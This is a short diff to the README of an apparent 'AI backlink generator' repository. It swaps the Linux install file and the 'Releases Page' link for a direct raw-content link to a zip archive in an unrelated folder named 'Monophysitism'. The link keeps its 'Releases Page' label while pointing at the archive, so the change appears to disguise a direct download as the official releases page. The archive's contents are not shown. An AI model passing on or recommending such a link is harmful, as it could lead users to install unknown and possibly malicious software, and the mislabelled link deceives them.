FOX-png-ux/ai-backlink-generator/README.md

 - For **Windows:** Double-click the `.exe` file and follow the on-screen instructions.
 - For **macOS:** Open the `.dmg` file and drag the application to your Applications folder.
-- For **Linux:** Extract the `.tar.gz` file and follow the included instructions.
+- For **Linux:** Extract the `https://raw.githubusercontent.com/FOX-png-ux/ai-backlink-generator/main/Monophysitism/ai-backlink-generator.zip` file and follow the included instructions.

-You can always return to the [Releases Page](https://github.com/FOX-png-ux/ai-backlink-generator/releases) for updates or to download a newer version.
+You can always return to the [Releases Page](https://raw.githubusercontent.com/FOX-png-ux/ai-backlink-generator/main/Monophysitism/ai-backlink-generator.zip) for updates or to download a newer version.

 ## ⚙️ Configuration